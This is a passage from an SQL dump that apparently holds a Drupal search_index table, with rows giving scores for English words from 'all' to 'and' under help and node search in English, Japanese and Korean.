('all', 22, 'ja', 'help_search', 1),
('all', 22, 'ko', 'help_search', 1),
('all', 23, 'en', 'node_search', 0.949597),
('all', 24, 'en', 'help_search', 1),
('all', 24, 'en', 'node_search', 1),
('all', 24, 'ja', 'help_search', 1),
('all', 24, 'ko', 'help_search', 1),
('all', 31, 'ja', 'help_search', 2.28248),
('all', 33, 'en', 'help_search', 1),
('all', 33, 'ja', 'help_search', 1),
('all', 33, 'ko', 'help_search', 1),
('all', 38, 'en', 'help_search', 1),
('all', 38, 'ja', 'help_search', 1),
('all', 38, 'ko', 'help_search', 1),
('all', 39, 'en', 'help_search', 1),
('all', 39, 'ja', 'help_search', 1),
('all', 39, 'ko', 'help_search', 1),
('all', 43, 'en', 'help_search', 1),
('all', 43, 'ja', 'help_search', 1),
('all', 43, 'ko', 'help_search', 1),
('all', 48, 'en', 'help_search', 1),
('all', 48, 'ja', 'help_search', 1),
('all', 48, 'ko', 'help_search', 1),
('all', 50, 'en', 'help_search', 1),
('all', 50, 'ja', 'help_search', 1),
('all', 50, 'ko', 'help_search', 1),
('all', 52, 'en', 'help_search', 2),
('all', 52, 'ja', 'help_search', 2),
('all', 52, 'ko', 'help_search', 2),
('all', 59, 'en', 'help_search', 1),
('all', 59, 'ja', 'help_search', 1),
('all', 59, 'ko', 'help_search', 1),
('all', 61, 'en', 'help_search', 1),
('all', 61, 'ja', 'help_search', 1),
('all', 61, 'ko', 'help_search', 1),
('all', 64, 'en', 'help_search', 1),
('all', 64, 'ja', 'help_search', 1),
('all', 64, 'ko', 'help_search', 1),
('all', 69, 'en', 'help_search', 2),
('all', 69, 'en', 'node_search', 1),
('all', 69, 'ja', 'help_search', 2),
('all', 69, 'ko', 'help_search', 2),
('all', 70, 'en', 'help_search', 4),
('all', 70, 'ja', 'help_search', 4),
('all', 70, 'ko', 'help_search', 4),
('all', 79, 'en', 'help_search', 1),
('all', 79, 'ja', 'help_search', 1),
('all', 79, 'ko', 'help_search', 1),
('all', 80, 'en', 'help_search', 2.96498),
('all', 80, 'ja', 'help_search', 2.96498),
('all', 80, 'ko', 'help_search', 2.96498),
('all', 84, 'en', 'help_search', 2),
('all', 84, 'ja', 'help_search', 2),
('all', 84, 'ko', 'help_search', 2),
('all', 87, 'en', 'help_search', 1),
('all', 87, 'ja', 'help_search', 1),
('all', 87, 'ko', 'help_search', 1),
('all', 89, 'en', 'help_search', 5),
('all', 89, 'ja', 'help_search', 5),
('all', 89, 'ko', 'help_search', 5),
('all', 91, 'en', 'help_search', 1),
('all', 91, 'ja', 'help_search', 1),
('all', 91, 'ko', 'help_search', 1),
('all', 92, 'en', 'help_search', 1),
('all', 92, 'ja', 'help_search', 1),
('all', 92, 'ko', 'help_search', 1),
('all', 98, 'en', 'node_search', 1),
('all', 136, 'en', 'node_search', 1),
('all', 140, 'en', 'node_search', 1),
('all', 154, 'en', 'node_search', 1),
('all', 167, 'en', 'node_search', 1),
('all', 173, 'en', 'node_search', 1),
('all', 183, 'en', 'node_search', 1),
('alleviate', 138, 'en', 'node_search', 1),
('allow', 7, 'en', 'help_search', 1),
('allow', 7, 'ja', 'help_search', 1),
('allow', 7, 'ko', 'help_search', 1),
('allow', 20, 'en', 'help_search', 2),
('allow', 20, 'ja', 'help_search', 2),
('allow', 20, 'ko', 'help_search', 2),
('allow', 22, 'en', 'help_search', 1),
('allow', 22, 'ja', 'help_search', 1),
('allow', 22, 'ko', 'help_search', 1),
('allow', 28, 'en', 'help_search', 1.89945),
('allow', 28, 'ja', 'help_search', 1.89945),
('allow', 28, 'ko', 'help_search', 1.89945),
('allow', 29, 'en', 'help_search', 0.980874),
('allow', 29, 'ja', 'help_search', 0.980874),
('allow', 29, 'ko', 'help_search', 0.980874),
('allow', 31, 'ja', 'help_search', 1),
('allow', 79, 'en', 'help_search', 1),
('allow', 79, 'ja', 'help_search', 1),
('allow', 79, 'ko', 'help_search', 1),
('allow', 88, 'en', 'help_search', 1),
('allow', 88, 'ja', 'help_search', 1),
('allow', 88, 'ko', 'help_search', 1),
('allow', 93, 'en', 'help_search', 1),
('allow', 93, 'ja', 'help_search', 1),
('allow', 93, 'ko', 'help_search', 1),
('allow', 193, 'en', 'node_search', 1),
('allowed', 7, 'en', 'help_search', 7.69854),
('allowed', 7, 'ja', 'help_search', 7.69854),
('allowed', 7, 'ko', 'help_search', 7.69854),
('allowed', 9, 'en', 'help_search', 3),
('allowed', 9, 'ja', 'help_search', 3),
('allowed', 9, 'ko', 'help_search', 3),
('allowed', 24, 'en', 'help_search', 4),
('allowed', 24, 'ja', 'help_search', 4),
('allowed', 24, 'ko', 'help_search', 4),
('allowed', 27, 'en', 'help_search', 4),
('allowed', 27, 'ja', 'help_search', 4),
('allowed', 27, 'ko', 'help_search', 4),
('allowed', 28, 'en', 'help_search', 1),
('allowed', 28, 'ja', 'help_search', 1),
('allowed', 28, 'ko', 'help_search', 1),
('allows', 2, 'en', 'help_search', 2),
('allows', 2, 'ja', 'help_search', 2),
('allows', 2, 'ko', 'help_search', 2),
('allows', 6, 'en', 'help_search', 0.976851),
('allows', 6, 'ja', 'help_search', 0.976851),
('allows', 6, 'ko', 'help_search', 0.976851),
('allows', 11, 'en', 'help_search', 0.892724),
('allows', 11, 'ja', 'help_search', 0.892724),
('allows', 11, 'ko', 'help_search', 0.892724),
('allows', 29, 'en', 'help_search', 1),
('allows', 29, 'ja', 'help_search', 1),
('allows', 29, 'ko', 'help_search', 1),
('allows', 31, 'ja', 'help_search', 0.876337),
('allows', 35, 'en', 'help_search', 1),
('allows', 35, 'ja', 'help_search', 1),
('allows', 35, 'ko', 'help_search', 1),
('allows', 37, 'en', 'help_search', 1.90974),
('allows', 37, 'ja', 'help_search', 1.90974),
('allows', 37, 'ko', 'help_search', 1.90974),
('allows', 42, 'en', 'help_search', 1),
('allows', 42, 'ja', 'help_search', 1),
('allows', 42, 'ko', 'help_search', 1),
('allows', 44, 'en', 'help_search', 1),
('allows', 44, 'ja', 'help_search', 1),
('allows', 44, 'ko', 'help_search', 1),
('allows', 47, 'en', 'help_search', 1),
('allows', 47, 'ja', 'help_search', 1),
('allows', 47, 'ko', 'help_search', 1),
('allows', 62, 'en', 'help_search', 2),
('allows', 62, 'ja', 'help_search', 2),
('allows', 62, 'ko', 'help_search', 2),
('allows', 65, 'en', 'help_search', 2),
('allows', 65, 'ja', 'help_search', 2),
('allows', 65, 'ko', 'help_search', 2),
('allows', 68, 'en', 'help_search', 1),
('allows', 68, 'ja', 'help_search', 1),
('allows', 68, 'ko', 'help_search', 1),
('allows', 69, 'en', 'help_search', 1),
('allows', 69, 'ja', 'help_search', 1),
('allows', 69, 'ko', 'help_search', 1),
('allows', 80, 'en', 'help_search', 0.945829),
('allows', 80, 'ja', 'help_search', 0.945829),
('allows', 80, 'ko', 'help_search', 0.945829),
('allows', 84, 'en', 'help_search', 3),
('allows', 84, 'ja', 'help_search', 3),
('allows', 84, 'ko', 'help_search', 3),
('allows', 93, 'en', 'help_search', 2.65179),
('allows', 93, 'ja', 'help_search', 2.65179),
('allows', 93, 'ko', 'help_search', 2.65179),
('along', 19, 'en', 'help_search', 1),
('along', 19, 'ja', 'help_search', 1),
('along', 19, 'ko', 'help_search', 1),
('along', 44, 'en', 'help_search', 1),
('along', 44, 'ja', 'help_search', 1),
('along', 44, 'ko', 'help_search', 1),
('already', 28, 'en', 'node_search', 1),
('already', 45, 'en', 'help_search', 2),
('already', 45, 'ja', 'help_search', 2),
('already', 45, 'ko', 'help_search', 2),
('already', 54, 'en', 'help_search', 1),
('already', 54, 'ja', 'help_search', 1),
('already', 54, 'ko', 'help_search', 1),
('already', 69, 'en', 'help_search', 1),
('already', 69, 'ja', 'help_search', 1),
('already', 69, 'ko', 'help_search', 1),
('already', 73, 'en', 'help_search', 1),
('already', 73, 'ja', 'help_search', 1),
('already', 73, 'ko', 'help_search', 1),
('already', 74, 'en', 'help_search', 2),
('already', 74, 'ja', 'help_search', 2),
('already', 74, 'ko', 'help_search', 2),
('already', 77, 'en', 'help_search', 2),
('already', 77, 'ja', 'help_search', 2),
('already', 77, 'ko', 'help_search', 2),
('already', 88, 'en', 'help_search', 1),
('already', 88, 'ja', 'help_search', 1),
('already', 88, 'ko', 'help_search', 1),
('already', 89, 'en', 'help_search', 2),
('already', 89, 'ja', 'help_search', 2),
('already', 89, 'ko', 'help_search', 2),
('already', 91, 'en', 'help_search', 1),
('already', 91, 'ja', 'help_search', 1),
('already', 91, 'ko', 'help_search', 1),
('already', 142, 'en', 'node_search', 1),
('alreadyconfigured', 66, 'en', 'help_search', 1),
('alreadyconfigured', 66, 'ja', 'help_search', 1),
('alreadyrendered', 37, 'en', 'help_search', 1),
('alreadyrendered', 37, 'ja', 'help_search', 1),
('alreadyrendered', 37, 'ko', 'help_search', 1),
('also', 7, 'en', 'help_search', 2),
('also', 7, 'en', 'node_search', 2),
('also', 7, 'ja', 'help_search', 2),
('also', 7, 'ko', 'help_search', 2),
('also', 7, 'ko', 'node_search', 2),
('also', 9, 'en', 'help_search', 1),
('also', 9, 'ja', 'help_search', 1),
('also', 9, 'ko', 'help_search', 1),
('also', 10, 'en', 'help_search', 1),
('also', 10, 'ja', 'help_search', 1),
('also', 10, 'ko', 'help_search', 1),
('also', 20, 'en', 'help_search', 1),
('also', 20, 'ja', 'help_search', 1),
('also', 20, 'ko', 'help_search', 1),
('also', 22, 'en', 'help_search', 2),
('also', 22, 'ja', 'help_search', 2),
('also', 22, 'ko', 'help_search', 2),
('also', 23, 'en', 'help_search', 1),
('also', 23, 'en', 'node_search', 1),
('also', 23, 'ja', 'help_search', 1),
('also', 23, 'ko', 'help_search', 1),
('also', 24, 'en', 'help_search', 1),
('also', 24, 'en', 'node_search', 0.98493),
('also', 24, 'ja', 'help_search', 1),
('also', 24, 'ko', 'help_search', 1),
('also', 25, 'ja', 'help_search', 1),
('also', 27, 'en', 'help_search', 1),
('also', 27, 'ja', 'help_search', 1),
('also', 27, 'ko', 'help_search', 1),
('also', 28, 'en', 'help_search', 1),
('also', 28, 'ja', 'help_search', 1),
('also', 28, 'ko', 'help_search', 1),
('also', 30, 'en', 'help_search', 1.58702),
('also', 30, 'ja', 'help_search', 1.58702),
('also', 30, 'ko', 'help_search', 1.58702),
('also', 31, 'ja', 'help_search', 3.37064),
('also', 32, 'en', 'help_search', 1),
('also', 32, 'ja', 'help_search', 1),
('also', 32, 'ko', 'help_search', 1),
('also', 34, 'en', 'help_search', 1),
('also', 34, 'ja', 'help_search', 1),
('also', 34, 'ko', 'help_search', 1),
('also', 35, 'en', 'help_search', 1),
('also', 35, 'ja', 'help_search', 1),
('also', 35, 'ko', 'help_search', 1),
('also', 36, 'en', 'help_search', 2),
('also', 36, 'ja', 'help_search', 2),
('also', 36, 'ko', 'help_search', 2),
('also', 37, 'en', 'help_search', 1),
('also', 37, 'ja', 'help_search', 1),
('also', 37, 'ko', 'help_search', 1),
('also', 38, 'en', 'help_search', 1),
('also', 38, 'ja', 'help_search', 1),
('also', 38, 'ko', 'help_search', 1),
('also', 39, 'en', 'help_search', 1),
('also', 39, 'ja', 'help_search', 1),
('also', 39, 'ko', 'help_search', 1),
('also', 41, 'en', 'help_search', 3),
('also', 41, 'ja', 'help_search', 3),
('also', 41, 'ko', 'help_search', 3),
('also', 43, 'en', 'help_search', 1),
('also', 43, 'ja', 'help_search', 1),
('also', 43, 'ko', 'help_search', 1),
('also', 44, 'en', 'help_search', 1),
('also', 44, 'ja', 'help_search', 1),
('also', 44, 'ko', 'help_search', 1),
('also', 46, 'en', 'help_search', 2),
('also', 46, 'ja', 'help_search', 2),
('also', 46, 'ko', 'help_search', 2),
('also', 47, 'en', 'help_search', 1),
('also', 47, 'ja', 'help_search', 1),
('also', 47, 'ko', 'help_search', 1),
('also', 48, 'en', 'help_search', 1),
('also', 48, 'ja', 'help_search', 1),
('also', 48, 'ko', 'help_search', 1),
('also', 49, 'en', 'help_search', 1),
('also', 49, 'ja', 'help_search', 1),
('also', 49, 'ko', 'help_search', 1),
('also', 56, 'en', 'help_search', 1),
('also', 56, 'ja', 'help_search', 1),
('also', 56, 'ko', 'help_search', 1),
('also', 57, 'en', 'help_search', 1),
('also', 57, 'ja', 'help_search', 1),
('also', 57, 'ko', 'help_search', 1),
('also', 59, 'en', 'help_search', 1),
('also', 59, 'ja', 'help_search', 1),
('also', 59, 'ko', 'help_search', 1),
('also', 60, 'en', 'help_search', 1),
('also', 60, 'ja', 'help_search', 1),
('also', 60, 'ko', 'help_search', 1),
('also', 62, 'en', 'node_search', 1),
('also', 63, 'en', 'help_search', 1),
('also', 63, 'ja', 'help_search', 1),
('also', 63, 'ko', 'help_search', 1),
('also', 64, 'en', 'help_search', 1),
('also', 64, 'ja', 'help_search', 1),
('also', 64, 'ko', 'help_search', 1),
('also', 68, 'en', 'help_search', 1.7001),
('also', 68, 'ja', 'help_search', 1.7001),
('also', 68, 'ko', 'help_search', 1.7001),
('also', 69, 'en', 'help_search', 2),
('also', 69, 'ja', 'help_search', 2),
('also', 69, 'ko', 'help_search', 2),
('also', 70, 'en', 'help_search', 1),
('also', 70, 'ja', 'help_search', 1),
('also', 70, 'ko', 'help_search', 1),
('also', 73, 'en', 'help_search', 1),
('also', 73, 'ja', 'help_search', 1),
('also', 73, 'ko', 'help_search', 1),
('also', 74, 'en', 'help_search', 1),
('also', 74, 'ja', 'help_search', 1),
('also', 74, 'ko', 'help_search', 1),
('also', 79, 'en', 'help_search', 2),
('also', 79, 'ja', 'help_search', 2),
('also', 79, 'ko', 'help_search', 2),
('also', 81, 'en', 'help_search', 1),
('also', 81, 'ja', 'help_search', 1),
('also', 81, 'ko', 'help_search', 1),
('also', 84, 'en', 'help_search', 1),
('also', 84, 'ja', 'help_search', 1),
('also', 84, 'ko', 'help_search', 1),
('also', 92, 'en', 'help_search', 1),
('also', 92, 'ja', 'help_search', 1),
('also', 92, 'ko', 'help_search', 1),
('also', 93, 'en', 'help_search', 1),
('also', 93, 'ja', 'help_search', 1),
('also', 93, 'ko', 'help_search', 1),
('also', 122, 'en', 'node_search', 1),
('also', 136, 'en', 'node_search', 1),
('also', 138, 'en', 'node_search', 1),
('also', 179, 'en', 'node_search', 1),
('also', 182, 'en', 'node_search', 1),
('also', 190, 'en', 'node_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('also', 199, 'en', 'node_search', 1),
('also', 204, 'en', 'node_search', 4),
('also', 204, 'ja', 'node_search', 4),
('alter', 68, 'en', 'help_search', 0.857458),
('alter', 68, 'ja', 'help_search', 0.857458),
('alter', 68, 'ko', 'help_search', 0.857458),
('alternative', 68, 'en', 'help_search', 1),
('alternative', 68, 'ja', 'help_search', 1),
('alternative', 68, 'ko', 'help_search', 1),
('alternatively', 22, 'en', 'help_search', 1),
('alternatively', 22, 'ja', 'help_search', 1),
('alternatively', 22, 'ko', 'help_search', 1),
('alternatively', 91, 'en', 'help_search', 1),
('alternatively', 91, 'ja', 'help_search', 0.997306),
('alternatively', 91, 'ko', 'help_search', 1),
('although', 3, 'en', 'node_search', 1),
('although', 3, 'ko', 'node_search', 1),
('always', 17, 'en', 'help_search', 1),
('always', 17, 'ja', 'help_search', 1),
('always', 17, 'ko', 'help_search', 1),
('always', 18, 'en', 'help_search', 1),
('always', 18, 'ja', 'help_search', 1),
('always', 18, 'ko', 'help_search', 1),
('always', 19, 'en', 'help_search', 1),
('always', 19, 'ja', 'help_search', 1),
('always', 19, 'ko', 'help_search', 1),
('always', 25, 'en', 'node_search', 1),
('always', 50, 'en', 'help_search', 1),
('always', 50, 'ja', 'help_search', 1),
('always', 50, 'ko', 'help_search', 1),
('american', 68, 'en', 'help_search', 0.976851),
('american', 68, 'ja', 'help_search', 0.976851),
('american', 68, 'ko', 'help_search', 0.976851),
('among', 135, 'en', 'node_search', 1),
('amount', 31, 'en', 'node_search', 0.997306),
('ancestors', 69, 'en', 'node_search', 1),
('anchor', 48, 'en', 'help_search', 4),
('anchor', 48, 'ja', 'help_search', 4),
('anchor', 48, 'ko', 'help_search', 4),
('and', 1, 'en', 'help_search', 2),
('and', 1, 'en', 'node_search', 2),
('and', 1, 'ja', 'help_search', 2),
('and', 1, 'ko', 'help_search', 2),
('and', 2, 'en', 'help_search', 4),
('and', 2, 'ja', 'help_search', 4),
('and', 2, 'ko', 'help_search', 4),
('and', 3, 'en', 'help_search', 3),
('and', 3, 'en', 'node_search', 1.98902),
('and', 3, 'ja', 'help_search', 3),
('and', 3, 'ko', 'help_search', 3),
('and', 3, 'ko', 'node_search', 1.98087),
('and', 4, 'en', 'help_search', 1),
('and', 4, 'en', 'node_search', 2),
('and', 4, 'ja', 'help_search', 1),
('and', 4, 'ja', 'node_search', 2),
('and', 4, 'ko', 'help_search', 1),
('and', 5, 'en', 'help_search', 2),
('and', 5, 'en', 'node_search', 30),
('and', 5, 'ja', 'help_search', 2),
('and', 5, 'ko', 'help_search', 2),
('and', 5, 'ko', 'node_search', 30),
('and', 6, 'en', 'help_search', 56.4734),
('and', 6, 'en', 'node_search', 3),
('and', 6, 'ja', 'help_search', 56.4734),
('and', 6, 'ko', 'help_search', 56.4734),
('and', 7, 'en', 'help_search', 6.89272),
('and', 7, 'en', 'node_search', 2),
('and', 7, 'ja', 'help_search', 6.89272),
('and', 7, 'ko', 'help_search', 6.89272),
('and', 7, 'ko', 'node_search', 2),
('and', 8, 'en', 'help_search', 7),
('and', 8, 'en', 'node_search', 8),
('and', 8, 'ja', 'help_search', 7),
('and', 8, 'ko', 'help_search', 7),
('and', 9, 'en', 'help_search', 8),
('and', 9, 'en', 'node_search', 9),
('and', 9, 'ja', 'help_search', 8),
('and', 9, 'ko', 'help_search', 8),
('and', 10, 'en', 'help_search', 6),
('and', 10, 'en', 'node_search', 4),
('and', 10, 'ja', 'help_search', 6),
('and', 10, 'ko', 'help_search', 6),
('and', 10, 'ko', 'node_search', 4),
('and', 11, 'en', 'help_search', 14.5978),
('and', 11, 'ja', 'help_search', 14.5978),
('and', 11, 'ko', 'help_search', 14.5978),
('and', 12, 'en', 'help_search', 3),
('and', 12, 'ja', 'help_search', 3),
('and', 12, 'ko', 'help_search', 3),
('and', 13, 'en', 'help_search', 3),
('and', 13, 'ja', 'help_search', 3),
('and', 13, 'ko', 'help_search', 3),
('and', 14, 'en', 'help_search', 5),
('and', 14, 'ja', 'help_search', 5),
('and', 14, 'ko', 'help_search', 5),
('and', 15, 'en', 'help_search', 1),
('and', 15, 'ja', 'help_search', 1),
('and', 15, 'ko', 'help_search', 1),
('and', 16, 'en', 'help_search', 8),
('and', 16, 'ja', 'help_search', 8),
('and', 16, 'ko', 'help_search', 8),
('and', 17, 'en', 'help_search', 4),
('and', 17, 'en', 'node_search', 12),
('and', 17, 'ja', 'help_search', 4),
('and', 17, 'ko', 'help_search', 4),
('and', 18, 'en', 'help_search', 3),
('and', 18, 'en', 'node_search', 2),
('and', 18, 'ja', 'help_search', 3),
('and', 18, 'ko', 'help_search', 3),
('and', 18, 'ko', 'node_search', 2),
('and', 19, 'en', 'help_search', 2),
('and', 19, 'ja', 'help_search', 2),
('and', 19, 'ko', 'help_search', 2),
('and', 20, 'en', 'help_search', 2),
('and', 20, 'ja', 'help_search', 2),
('and', 20, 'ko', 'help_search', 2),
('and', 21, 'en', 'help_search', 1),
('and', 21, 'ja', 'help_search', 1),
('and', 21, 'ko', 'help_search', 1),
('and', 22, 'en', 'help_search', 3.97685),
('and', 22, 'ja', 'help_search', 3.97685),
('and', 22, 'ko', 'help_search', 3.97685),
('and', 23, 'en', 'help_search', 15.3423),
('and', 23, 'en', 'node_search', 15.8006),
('and', 23, 'ja', 'help_search', 15.3423),
('and', 23, 'ko', 'help_search', 15.3423),
('and', 24, 'en', 'help_search', 8),
('and', 24, 'en', 'node_search', 16.8951),
('and', 24, 'ja', 'help_search', 8),
('and', 24, 'ja', 'node_search', 0.47729),
('and', 24, 'ko', 'help_search', 8),
('and', 25, 'en', 'help_search', 3),
('and', 25, 'en', 'node_search', 4),
('and', 25, 'ja', 'help_search', 3),
('and', 26, 'en', 'help_search', 2),
('and', 26, 'en', 'node_search', 4),
('and', 26, 'ja', 'help_search', 2),
('and', 26, 'ko', 'help_search', 2),
('and', 27, 'en', 'help_search', 8),
('and', 27, 'en', 'node_search', 24.1069),
('and', 27, 'ja', 'help_search', 8),
('and', 27, 'ko', 'help_search', 8),
('and', 28, 'en', 'help_search', 59.5847),
('and', 28, 'en', 'node_search', 29),
('and', 28, 'ja', 'help_search', 59.5847),
('and', 28, 'ko', 'help_search', 59.5847),
('and', 29, 'en', 'help_search', 23.1993),
('and', 29, 'ja', 'help_search', 23.1993),
('and', 29, 'ko', 'help_search', 23.1993),
('and', 30, 'en', 'help_search', 40.2271),
('and', 30, 'en', 'node_search', 4),
('and', 30, 'ja', 'help_search', 40.2271),
('and', 30, 'ko', 'help_search', 40.2271),
('and', 31, 'en', 'node_search', 7.65091),
('and', 31, 'ja', 'help_search', 19.524),
('and', 32, 'en', 'help_search', 29.9973),
('and', 32, 'ja', 'help_search', 29.9973),
('and', 32, 'ko', 'help_search', 29.9973),
('and', 33, 'en', 'help_search', 62),
('and', 33, 'ja', 'help_search', 62),
('and', 33, 'ko', 'help_search', 62),
('and', 34, 'en', 'help_search', 70),
('and', 34, 'ja', 'help_search', 70),
('and', 34, 'ko', 'help_search', 70),
('and', 35, 'en', 'help_search', 9.99315),
('and', 35, 'ja', 'help_search', 9.99315),
('and', 35, 'ko', 'help_search', 9.99315),
('and', 36, 'en', 'help_search', 2),
('and', 36, 'ja', 'help_search', 2),
('and', 36, 'ko', 'help_search', 2),
('and', 37, 'en', 'help_search', 10.5892),
('and', 37, 'ja', 'help_search', 10.5892),
('and', 37, 'ko', 'help_search', 10.5892),
('and', 38, 'en', 'help_search', 26),
('and', 38, 'ja', 'help_search', 26),
('and', 38, 'ko', 'help_search', 26),
('and', 39, 'en', 'help_search', 3),
('and', 39, 'ja', 'help_search', 3),
('and', 39, 'ko', 'help_search', 3),
('and', 40, 'en', 'help_search', 2),
('and', 40, 'ja', 'help_search', 2),
('and', 40, 'ko', 'help_search', 2),
('and', 41, 'en', 'help_search', 34),
('and', 41, 'ja', 'help_search', 34),
('and', 41, 'ko', 'help_search', 34),
('and', 42, 'en', 'help_search', 3),
('and', 42, 'ja', 'help_search', 3),
('and', 42, 'ko', 'help_search', 3),
('and', 43, 'en', 'help_search', 11.5995),
('and', 43, 'ja', 'help_search', 11.5995),
('and', 43, 'ko', 'help_search', 11.5995),
('and', 44, 'en', 'help_search', 19),
('and', 44, 'ja', 'help_search', 19),
('and', 44, 'ko', 'help_search', 19),
('and', 45, 'en', 'help_search', 9),
('and', 45, 'ja', 'help_search', 9),
('and', 45, 'ko', 'help_search', 9),
('and', 46, 'en', 'help_search', 8.95792),
('and', 46, 'ja', 'help_search', 8.95792),
('and', 46, 'ko', 'help_search', 8.95792),
('and', 47, 'en', 'help_search', 1),
('and', 47, 'ja', 'help_search', 1),
('and', 47, 'ko', 'help_search', 1),
('and', 48, 'en', 'help_search', 5),
('and', 48, 'ja', 'help_search', 5),
('and', 48, 'ko', 'help_search', 5),
('and', 49, 'en', 'help_search', 8),
('and', 49, 'ja', 'help_search', 8),
('and', 49, 'ko', 'help_search', 8),
('and', 50, 'en', 'help_search', 35.9689),
('and', 50, 'ja', 'help_search', 35.9689),
('and', 50, 'ko', 'help_search', 35.9689),
('and', 51, 'en', 'help_search', 6),
('and', 51, 'ja', 'help_search', 6),
('and', 51, 'ko', 'help_search', 6),
('and', 52, 'en', 'help_search', 5),
('and', 52, 'ja', 'help_search', 5),
('and', 52, 'ko', 'help_search', 5),
('and', 53, 'en', 'help_search', 5),
('and', 53, 'ja', 'help_search', 5),
('and', 53, 'ko', 'help_search', 5),
('and', 54, 'en', 'help_search', 5),
('and', 54, 'ja', 'help_search', 5),
('and', 54, 'ko', 'help_search', 5),
('and', 55, 'en', 'help_search', 1),
('and', 55, 'ja', 'help_search', 1),
('and', 55, 'ko', 'help_search', 1),
('and', 56, 'en', 'help_search', 4),
('and', 56, 'ja', 'help_search', 4),
('and', 56, 'ko', 'help_search', 4),
('and', 58, 'en', 'help_search', 27),
('and', 58, 'ja', 'help_search', 27),
('and', 58, 'ko', 'help_search', 27),
('and', 59, 'en', 'help_search', 3),
('and', 59, 'ja', 'help_search', 3),
('and', 59, 'ko', 'help_search', 3),
('and', 60, 'en', 'help_search', 6),
('and', 60, 'ja', 'help_search', 6),
('and', 60, 'ko', 'help_search', 6),
('and', 61, 'en', 'help_search', 22),
('and', 61, 'ja', 'help_search', 22),
('and', 61, 'ko', 'help_search', 22),
('and', 62, 'en', 'help_search', 11),
('and', 62, 'en', 'node_search', 13.3118),
('and', 62, 'ja', 'help_search', 11),
('and', 62, 'ko', 'help_search', 11),
('and', 63, 'en', 'help_search', 6),
('and', 63, 'ja', 'help_search', 6),
('and', 63, 'ko', 'help_search', 6),
('and', 64, 'en', 'help_search', 5),
('and', 64, 'ja', 'help_search', 5),
('and', 64, 'ko', 'help_search', 5),
('and', 65, 'en', 'help_search', 31),
('and', 65, 'ja', 'help_search', 31),
('and', 65, 'ko', 'help_search', 31),
('and', 66, 'en', 'help_search', 6),
('and', 66, 'en', 'node_search', 10.9458),
('and', 66, 'ja', 'help_search', 6),
('and', 67, 'en', 'help_search', 13.7539),
('and', 67, 'ja', 'help_search', 13.7539),
('and', 67, 'ja', 'node_search', 2),
('and', 67, 'ko', 'help_search', 13.7539),
('and', 68, 'en', 'help_search', 9.36877),
('and', 68, 'ja', 'help_search', 9.36877),
('and', 68, 'ko', 'help_search', 9.36877),
('and', 69, 'en', 'help_search', 30.9973),
('and', 69, 'en', 'node_search', 3),
('and', 69, 'ja', 'help_search', 30.9973),
('and', 69, 'ko', 'help_search', 30.9973),
('and', 70, 'en', 'help_search', 1),
('and', 70, 'ja', 'help_search', 1),
('and', 70, 'ko', 'help_search', 1),
('and', 71, 'en', 'help_search', 16),
('and', 71, 'ja', 'help_search', 16),
('and', 71, 'ko', 'help_search', 16),
('and', 72, 'en', 'help_search', 26.7011),
('and', 72, 'ja', 'help_search', 26.7011),
('and', 72, 'ko', 'help_search', 26.7011),
('and', 73, 'en', 'help_search', 30),
('and', 73, 'ja', 'help_search', 30),
('and', 73, 'ko', 'help_search', 30),
('and', 75, 'en', 'help_search', 3),
('and', 75, 'ja', 'help_search', 3),
('and', 75, 'ko', 'help_search', 3),
('and', 76, 'en', 'help_search', 15),
('and', 76, 'ja', 'help_search', 15),
('and', 76, 'ko', 'help_search', 15),
('and', 77, 'en', 'help_search', 29),
('and', 77, 'en', 'node_search', 4),
('and', 77, 'ja', 'help_search', 29),
('and', 77, 'ko', 'help_search', 29),
('and', 79, 'en', 'help_search', 9),
('and', 79, 'ja', 'help_search', 9),
('and', 79, 'ko', 'help_search', 9),
('and', 80, 'en', 'help_search', 9.71009),
('and', 80, 'en', 'node_search', 2),
('and', 80, 'ja', 'help_search', 9.71009),
('and', 80, 'ko', 'help_search', 9.71009),
('and', 81, 'en', 'help_search', 4),
('and', 81, 'ja', 'help_search', 4),
('and', 81, 'ko', 'help_search', 4),
('and', 82, 'en', 'help_search', 1),
('and', 82, 'ja', 'help_search', 1),
('and', 82, 'ko', 'help_search', 1),
('and', 83, 'en', 'help_search', 1),
('and', 83, 'en', 'node_search', 1),
('and', 83, 'ja', 'help_search', 1),
('and', 83, 'ja', 'node_search', 1),
('and', 83, 'ko', 'help_search', 1),
('and', 84, 'en', 'help_search', 52),
('and', 84, 'ja', 'help_search', 52),
('and', 84, 'ko', 'help_search', 52),
('and', 85, 'en', 'help_search', 1),
('and', 85, 'ja', 'help_search', 1),
('and', 85, 'ko', 'help_search', 1),
('and', 86, 'en', 'help_search', 47),
('and', 86, 'ja', 'help_search', 47),
('and', 86, 'ko', 'help_search', 47),
('and', 87, 'en', 'help_search', 4),
('and', 87, 'en', 'node_search', 11),
('and', 87, 'ja', 'help_search', 4),
('and', 87, 'ko', 'help_search', 4),
('and', 88, 'en', 'help_search', 4),
('and', 88, 'en', 'node_search', 1),
('and', 88, 'ja', 'help_search', 4),
('and', 88, 'ja', 'node_search', 1),
('and', 88, 'ko', 'help_search', 4),
('and', 89, 'en', 'help_search', 5),
('and', 89, 'en', 'node_search', 1),
('and', 89, 'ja', 'help_search', 5),
('and', 89, 'ja', 'node_search', 1),
('and', 89, 'ko', 'help_search', 5),
('and', 90, 'en', 'help_search', 5),
('and', 90, 'ja', 'help_search', 5),
('and', 90, 'ko', 'help_search', 5),
('and', 91, 'en', 'help_search', 3.98902),
('and', 91, 'en', 'node_search', 2),
('and', 91, 'ja', 'help_search', 3.98493),
('and', 91, 'ja', 'node_search', 2),
('and', 91, 'ko', 'help_search', 3.98902),
('and', 92, 'en', 'help_search', 40),
('and', 92, 'en', 'node_search', 1),
('and', 92, 'ja', 'help_search', 40),
('and', 92, 'ja', 'node_search', 1),
('and', 92, 'ko', 'help_search', 40),
('and', 93, 'en', 'help_search', 8.05703),
('and', 93, 'en', 'node_search', 3),
('and', 93, 'ja', 'help_search', 8.05703),
('and', 93, 'ja', 'node_search', 3),
('and', 93, 'ko', 'help_search', 8.05703),
('and', 94, 'en', 'node_search', 1),
('and', 96, 'en', 'node_search', 1),
('and', 96, 'ja', 'node_search', 1),
('and', 97, 'en', 'node_search', 4),
('and', 97, 'ja', 'node_search', 4),
('and', 98, 'en', 'node_search', 1),
('and', 99, 'en', 'node_search', 1),
('and', 99, 'ja', 'node_search', 1),
('and', 103, 'en', 'node_search', 7),
('and', 103, 'ja', 'node_search', 7),
('and', 105, 'en', 'node_search', 1),
('and', 105, 'ja', 'node_search', 1),
